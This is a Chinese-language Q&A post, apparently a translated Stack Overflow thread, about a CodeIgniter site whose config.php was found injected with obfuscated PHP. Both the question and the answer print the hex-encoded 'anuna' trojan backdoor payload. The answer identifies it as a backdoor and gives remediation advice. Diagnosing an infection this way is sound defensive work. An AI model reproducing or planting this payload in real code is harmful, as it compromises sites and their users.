几个月前,我在Codeigniter中创建了一个站点并将其上传到实时服务器。它工作正常,直到所有者指示我对该站点上的文件执行一些更新。我在本地计算机上备份并设置该站点,并且我注意到许多额外奇怪的字符现在包含在许多文件源代码中。例如config.php文件
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $nqzonxuuvd = '85csboe))1%x5c%x782f35.)x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QU-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y325fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]27;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%%x782f!**#sfmcnbs+yfeobz+sfwjidsb%1]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y3e]81#%x5c%x782f#7e7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x7("%x2f%50%x2e%52%x29%57%x6%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x225c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%xx787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5crr)%x5c%x7825r%x5c%x7x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985tjyf%x5c%x7860%x5c%x7878%x~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osgj6<*doj%x5c%x78257-C)fepmqnjA%x5o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x78#Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7824-tusqpt)%x5c%x7825z-#:#*74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x782c%x7827!hmg%x5c%x7825)!gj!<2,*j%xx7824<%x5c%x7825j,,*!|%xc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x7825bss-%x5c%x7825r%x5c8256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*Q]y33]65]y31]55]y85]82]x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutx5c%x7825)}.;%x5c%x7860UQPMSVD!-*b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c5c%x7825:>:r%x5c%x7825:|:**t%xjyf%x5c%x78604%x5c%x78g39*56A:>:8:|:7#6#)tutjyfx5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)s#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)4%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*1x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74],#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%xW%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825c%x7825-
最初,我的config.php文件看起来像这样
<?php
defined('BASEPATH') OR exit('No direct script access allowed');
除了一些错误通知(PHP中已弃用的通知)之外,这个网站仍在工作,因为这个网站使用旧版本的PHP,可以通过调整php.ini文件来关闭。
知道发生了什么事吗?
答案 0 :(得分:0)
<?php
if(!isset($GLOBALS["anuna"])) {
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
if ((! strstr($ua,"msie")) and (! strstr($ua,"rv:11")))
$GLOBALS["anuna"] = 1;
}
?>
<?php
$nqzonxuuvd = '85csboe))1%x5c%x782f35.)x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QU-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y325fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]27;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%%x782f!**#sfmcnbs+yfeobz+sfwjidsb%1]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y3e]81#%x5c%x782f#7e7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x7("%x2f%50%x2e%52%x29%57%x6%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x225c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%xx787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5crr)%x5c%x7825r%x5c%x7x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985tjyf%x5c%x7860%x5c%x7878%x~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osgj6<*doj%x5c%x78257-C)fepmqnjA%x5o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x78#Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7824-tusqpt)%x5c%x7825z-#:#*74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x782c%x7827!hmg%x5c%x7825)!gj!<2,*j%xx7824<%x5c%x7825j,,*!|%xc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x7825bss-%x5c%x7825r%x5c8256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*Q]y33]65]y31]55]y85]82]x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutx5c%x7825)}.;%x5c%x7860UQPMSVD!-*b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c5c%x7825:>:r%x5c%x7825:|:**t%xjyf%x5c%x78604%x5c%x78g39*56A:>:8:|:7#6#)tutjyfx5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)s#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)4%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*1x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74],#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%xW%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825c%x7825-
此代码第二行中提到的anuna是一个木马后门。您可以阅读技术详细信息及其here。
你被黑了。您应该更改密码,查看服务器日志并上传网站的新副本。